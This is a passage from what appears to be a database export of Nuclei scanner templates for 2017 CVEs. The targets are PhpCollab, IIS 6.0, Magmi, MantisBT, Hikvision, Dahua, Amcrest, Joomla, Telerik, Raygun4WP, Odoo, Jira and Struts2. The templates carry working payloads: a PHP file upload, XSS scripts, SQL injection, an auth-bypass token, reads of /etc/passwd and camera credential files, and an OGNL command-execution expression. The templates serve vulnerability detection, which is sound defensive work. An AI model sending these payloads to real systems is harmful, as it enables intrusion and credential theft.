a direct request to the file in logos_clients/ via clients/editclient.php.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system.\n remediation: |\n Apply the 
latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability.\n reference:\n - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/\n - https://nvd.nist.gov/vuln/detail/CVE-2017-6090\n - https://www.exploit-db.com/exploits/42934/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2017-6090\n cwe-id: CWE-434\n epss-score: 0.97204\n epss-percentile: 0.99787\n cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: phpcollab\n product: phpcollab\n shodan-query: http.title:\"PhpCollab\"\n tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive\n\nhttp:\n - raw:\n - |\n POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n -----------------------------154934846911423734231554128137\n Content-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\n Content-Type: application/x-php\n\n \n\n -----------------------------154934846911423734231554128137--\n - |\n GET /logos_clients/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"48dbd2384cb6b996fa1e2855c7f0567f\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210082359a86174a4f722113b6f6cb2339f0f2892f7a6860cc5272cdd6b668b345e202202711db56d7104f7f16cc78a571e79c7b1befe15bed8c5524b6dad8082dbae73b:922c64590222798bb761d5b6d8e72950", "hash": "22ae3f5d57305a49ed615a1bf85a2fa7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308002" }, "name": "CVE-2017-7269.yaml", "content": "id: CVE-2017-7269\n\ninfo:\n name: Windows Server 2003 & IIS 6.0 - Remote Code Execution\n author: thomas_from_offensity,geeknik\n severity: critical\n description: |\n Internet Information Services (IIS) 
6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with \"If \", dasl)\n - regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)\n - regex(\".*?PROPFIND\", public)\n - regex(\".*?PROPFIND\", allow)\n condition: or\n\n - type: word\n part: header\n words:\n - \"IIS/6.0\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022022020aa8a873fc818a13eee28f236f26cae0b0aa75204ada8c216d36f82b6d7c022027edcd8a1cc6e78bf98d96759d25094658fc6bce1a48f195a363cece01b7f99c:922c64590222798bb761d5b6d8e72950", "hash": "531d22f0d2a903b9b046fa9e02349223", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308003" }, "name": "CVE-2017-7391.yaml", "content": "id: CVE-2017-7391\n\ninfo:\n name: Magmi 0.7.22 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Magmi or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - https://github.com/dweeves/magmi-git/issues/522\n - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip\n - https://github.com/dweeves/magmi-git/pull/525\n - https://nvd.nist.gov/vuln/detail/CVE-2017-7391\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-7391\n cwe-id: CWE-79\n epss-score: 0.00195\n 
epss-percentile: 0.56428\n cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: magmi_project\n product: magmi\n tags: cve2017,cve,magmi,xss,magmi_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"><'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220255b4c36fbfca640300f406d76a18de517faa9583bb267338fc7a2d4b36ac070022100e236f6809fd321445907dbc37b9c4def04ad09fc52f798e4324fa84812fd5331:922c64590222798bb761d5b6d8e72950", "hash": "3bd71b98058a4343c602bb3424245c27", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308004" }, "name": "CVE-2017-7615.yaml", "content": "id: CVE-2017-7615\n\n# THIS TEMPLATE IS ONLY FOR DETECTING\n# To carry out further attacks, please see reference[2] below.\n# This template works by guessing user ID.\n# MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1].\ninfo:\n name: MantisBT <=2.30 - Arbitrary Password Reset/Admin Access\n author: bp0lr,dwisiswant0\n severity: high\n description: |\n MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized password resets and unauthorized administrative access.\n remediation: |\n Upgrade MantisBT to a version higher than 2.30 to mitigate this vulnerability.\n reference:\n - https://sourceforge.net/projects/mantisbt/files/mantis-stable/\n - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt\n - https://www.exploit-db.com/exploits/41890\n - http://www.openwall.com/lists/oss-security/2017/04/16/2\n - 
https://nvd.nist.gov/vuln/detail/CVE-2017-7615\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2017-7615\n cwe-id: CWE-640\n epss-score: 0.97404\n epss-percentile: 0.99917\n cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*\n metadata:\n max-request: 5\n vendor: mantisbt\n product: mantisbt\n tags: cve,cve2017,mantisbt,unauth,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/verify.php?id=1&confirm_hash=\"\n - \"{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=\"\n - \"{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=\"\n - \"{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=\"\n - \"{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'\n - 'IceWarp'\n condition: and\n case-insensitive: true\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ecd748d0da7f1f3e5a44b0351d29bf699e21b0bcfd59e00013b81f7dde887d6f02204f738f06eb2c47e277ac21b6bf66fc965783038678586e2b9e397c57124bc240:922c64590222798bb761d5b6d8e72950", "hash": "2bbfe65724bf0c99dd5819de8739b673", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308006" }, "name": "CVE-2017-7921.yaml", "content": "id: CVE-2017-7921\n\ninfo:\n name: Hikvision - Authentication Bypass\n author: princechaddha\n severity: critical\n description: Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. 
The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, unauthorized configuration changes, and potential device takeover.\n remediation: |\n Apply the latest firmware update provided by Hikvision to fix the authentication bypass vulnerability.\n reference:\n - http://www.hikvision.com/us/about_10805.html\n - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01\n - https://nvd.nist.gov/vuln/detail/CVE-2017-7921\n - https://ghostbin.com/paste/q2vq2\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2017-7921\n cwe-id: CWE-287\n epss-score: 0.01361\n epss-percentile: 0.85934\n cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: hikvision\n product: ds-2cd2032-i_firmware\n tags: cve,cve2017,auth-bypass,hikvision\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n# digest: 4b0a00483046022100c915ea5b7a67b269e652cfe5189fbeef5beca1a6e3a09c0ee59298ed9bfbede3022100a8f03caa34047f0f2cd4751cf4c772529f216a56e3e91553f99c1a7eef9bd6e4:922c64590222798bb761d5b6d8e72950", "hash": "d70c1e838b3f361d73be663677f12f69", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308007" }, "name": "CVE-2017-7925.yaml", "content": "id: CVE-2017-7925\n\ninfo:\n name: Dahua Security - Configuration File Disclosure\n author: E1A,none\n severity: critical\n description: |\n A Password in Configuration File issue was discovered in 
Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive information, potentially compromising the security of the system.\n remediation: |\n To remediate this vulnerability, ensure that the configuration file is properly secured and access to it is restricted to authorized personnel only.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2017-7925\n - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-02\n - http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-7925\n cwe-id: CWE-522,CWE-260\n epss-score: 0.42592\n epss-percentile: 0.97235\n cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dahuasecurity\n product: dh-ipc-hdbw23a0rn-zs_firmware\n shodan-query: http.favicon.hash:2019488876\n tags: cve,cve2017,dahua,camera,dahuasecurity\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/current_config/passwd\"\n\n matchers:\n - type: dsl\n dsl:\n - contains(to_lower(body), \"ugm\")\n - contains(to_lower(body), \"id:name:passwd\")\n - status_code == 200\n condition: and\n\n extractors:\n - type: regex\n group: 1\n regex:\n - 1:(.*:.*):1:CtrPanel\n# digest: 4a0a00473045022100b025841e51356e6480d45b4bdac30058df82b301fc177b329ddfaae64739dc7d022055c5f87e84ec531417e24f1d4eacca97cbb1485d8cda61206978c53803ee605b:922c64590222798bb761d5b6d8e72950", "hash": "20bb4be75b4f5a349e5f51391cd3e95f", "level": 6, "time": 
"2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308008" }, "name": "CVE-2017-8229.yaml", "content": "id: CVE-2017-8229\n\ninfo:\n name: Amcrest IP Camera Web Management - Data Exposure\n author: pussycat0x\n severity: critical\n description: |\n Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.\n impact: |\n An attacker can gain unauthorized access to sensitive data.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2017-8229\n - http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html\n - https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf\n - https://seclists.org/bugtraq/2019/Jun/8\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-8229\n cwe-id: CWE-255\n epss-score: 0.89506\n epss-percentile: 0.98685\n cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: amcrest\n product: ipm-721s_firmware\n shodan-query: html:\"Amcrest\"\n fofa-query: \"Amcrest\"\n tags: cve2017,cve,packetstorm,seclists,amcrest,iot\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/current_config/Sha1Account1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DevInformation\"\n - \"SerialID\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b6fd9d1debb3a00599d529ed9870adb5c6425994cafe24875150518f3a770549022010a916473eeea40a72614d21ce4acd2715c401e4e6bd33fd9bdf6440eac4788d:922c64590222798bb761d5b6d8e72950", "hash": "fcebdb82aa5472fc0d7107411eb26fce", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { 
"$oid": "66477a413521042ccf308009" }, "name": "CVE-2017-8917.yaml", "content": "id: CVE-2017-8917\n\ninfo:\n name: Joomla! <3.7.1 - SQL Injection\n author: princechaddha\n severity: critical\n description: |\n Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the entire Joomla! website.\n remediation: |\n Upgrade Joomla! to version 3.7.1 or later to mitigate the SQL Injection vulnerability.\n reference:\n - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-8917\n - https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522\n - http://www.securitytracker.com/id/1038522\n - https://github.com/binfed/cms-exp\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-8917\n cwe-id: CWE-89\n epss-score: 0.97555\n epss-percentile: 0.99997\n cpe: cpe:2.3:a:joomla:joomla\\!:3.7.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: joomla\n product: joomla\\!\n shodan-query: http.component:\"Joomla\"\n tags: cve2017,cve,joomla,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)\"\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5(num)}}'\n# digest: 490a0046304402202a42607f81069bc80a480ecb156ace94e0e76862ee4d3c4f68a9b927f241d59402207c07437e69c7376ab7c771a7bb2fa469bcc225985cb16e57a19da92fe3f20241:922c64590222798bb761d5b6d8e72950", "hash": "30a683b5f1e906ca4f6608632d7bee3e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { 
"$oid": "66477a413521042ccf30800a" }, "name": "CVE-2017-9140.yaml", "content": "id: CVE-2017-9140\n\ninfo:\n name: Reflected XSS - Telerik Reporting Module\n author: dhiyaneshDk\n severity: medium\n description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement of web pages, or theft of sensitive information.\n remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.\n reference:\n - https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9140\n - https://www.veracode.com/blog/research/anatomy-cross-site-scripting-flaw-telerik-reporting-module\n - http://www.telerik.com/support/whats-new/reporting/release-history/telerik-reporting-r1-2017-sp2-(version-11-0-17-406)\n - https://knowledgebase.progress.com/articles/Article/Security-Advisory-for-Resolving-Security-vulnerabilities-September-2018\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-9140\n cwe-id: CWE-79\n epss-score: 0.00191\n epss-percentile: 0.55758\n cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: progress\n product: telerik_reporting\n tags: cve2017,cve,xss,telerik,progress\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '#000000\"onload=\"prompt(1)'\n - 'Telerik.ReportViewer.axd?name=Resources'\n 
condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e69bdcb3fa2b283c1b6182024ffdd266efd7457251b67234e56db326860d8c2b022100c6f67d7e4165debb3d19c617f22631630858768926f95b9f399c5a9980ab4302:922c64590222798bb761d5b6d8e72950", "hash": "d017a4ccb6c94155e2811b31b7822d36", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30800b" }, "name": "CVE-2017-9288.yaml", "content": "id: CVE-2017-9288\n\ninfo:\n name: WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Raygun4WP 1.8.0 contains a reflected cross-site scripting vulnerability via sendtesterror.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Raygun4WP plugin (1.8.0 or higher) to mitigate this vulnerability.\n reference:\n - https://github.com/MindscapeHQ/raygun4wordpress/pull/17\n - https://github.com/MindscapeHQ/raygun4wordpress/issues/16\n - http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9288\n - https://wpvulndb.com/vulnerabilities/8836\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-9288\n cwe-id: CWE-79\n epss-score: 0.00168\n epss-percentile: 0.52791\n cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: raygun\n product: raygun4wp\n framework: wordpress\n tags: cve2017,cve,wordpress,xss,wp-plugin,raygun\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Raygun4WP'\n - 'Tags:'\n condition: and\n\n - method: 
GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009a5bb9d6ed82d7766d04e93226e4ab9aaacc265ab8feee1621e74ecd4b7fb76e022100aea36e48ce640598175ed79b106073b46b52ac7bacff32398f09dfbb02f8d5ae:922c64590222798bb761d5b6d8e72950", "hash": "52311bd3e108ce84dae927b3776bbfa5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30800c" }, "name": "CVE-2017-9416.yaml", "content": "id: CVE-2017-9416\n\ninfo:\n name: Odoo 8.0/9.0/10.0 - Local File Inclusion\n author: Co5mos\n severity: medium\n description: |\n Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Allows an attacker to read arbitrary files on the server.\n remediation: |\n Upgrade to a patched version of Odoo or apply the necessary security patches.\n reference:\n - https://github.com/odoo/odoo/issues/17394\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9416\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2017-9416\n cwe-id: CWE-22\n epss-score: 0.01037\n epss-percentile: 0.83585\n cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: odoo\n product: odoo\n tags: cve2017,cve,odoo,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/base_import/static/c:/windows/win.ini\"\n - \"{{BaseURL}}/base_import/static/etc/passwd\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - \"regex('root:.*:0:0:', body)\"\n - \"status_code == 
200\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(body, 'bit app support')\"\n - \"contains(body, 'fonts')\"\n - \"contains(body, 'extensions')\"\n - \"status_code == 200\"\n condition: and\n# digest: 4a0a00473045022100eeb180faf838b4927b92bf8517268ab8712df323d040cc7f15dbb2aa4ab9062e02202242d7b85aaddb683b6a9c5637ecaf2c10d6770fa42f98931746defb95e70d7f:922c64590222798bb761d5b6d8e72950", "hash": "d9b605ee3d57fd21e4e98315e489f54c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30800d" }, "name": "CVE-2017-9506.yaml", "content": "id: CVE-2017-9506\n\ninfo:\n name: Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery\n author: pdteam\n severity: medium\n description: The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery.\n impact: |\n Successful exploitation of these vulnerabilities could lead to unauthorized access, data theft, and potential server-side attacks.\n remediation: |\n Apply the latest security patches provided by Atlassian to mitigate these vulnerabilities.\n reference:\n - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html\n - https://ecosystem.atlassian.net/browse/OAUTH-344\n - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3\n - https://nvd.nist.gov/vuln/detail/CVE-2017-9506\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-9506\n cwe-id: CWE-918\n epss-score: 0.00575\n epss-percentile: 0.75564\n cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: oauth\n shodan-query: http.component:\"Atlassian Jira\"\n tags: 
cve,cve2017,atlassian,jira,ssrf,oast\n\nhttp:\n - raw:\n - |\n GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a00473045022010826ceb3cc6e35143b7d9e13d87a6e20adf7cc28c355d0da4dcde85a4544058022100f3178910fc458d53ee0722f0e868981ccc3d9167c7c798cb25286ee17fb4cf63:922c64590222798bb761d5b6d8e72950", "hash": "62bf06870a4b4a2f07d2780d86bc4860", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30800e" }, "name": "CVE-2017-9791.yaml", "content": "id: CVE-2017-9791\n\ninfo:\n name: Apache Struts2 S2-053 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: |\n Apache Struts 2.1.x and 2.3.x with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.\n impact: |\n Remote code execution\n remediation: |\n Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.\n reference:\n - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html\n - http://struts.apache.org/docs/s2-048.html\n - http://web.archive.org/web/20211207175819/https://securitytracker.com/id/1038838\n - http://www.securitytracker.com/id/1038838\n - https://security.netapp.com/advisory/ntap-20180706-0002/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2017-9791\n cwe-id: CWE-20\n epss-score: 0.97448\n epss-percentile: 0.99947\n cpe: cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: struts\n shodan-query: title:\"Struts2 Showcase\"\n fofa-query: title=\"Struts2 Showcase\"\n tags: cve2017,cve,apache,rce,struts,kev\nvariables:\n num1: \"{{rand_int(40000, 44800)}}\"\n num2: \"{{rand_int(40000, 
44800)}}\"\n result: \"{{to_number(num1)*to_number(num2)}}\"\n\n# CMD: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream())).(#q)}\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/integration/saveGangster.action\"\n\n body: |\n name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 
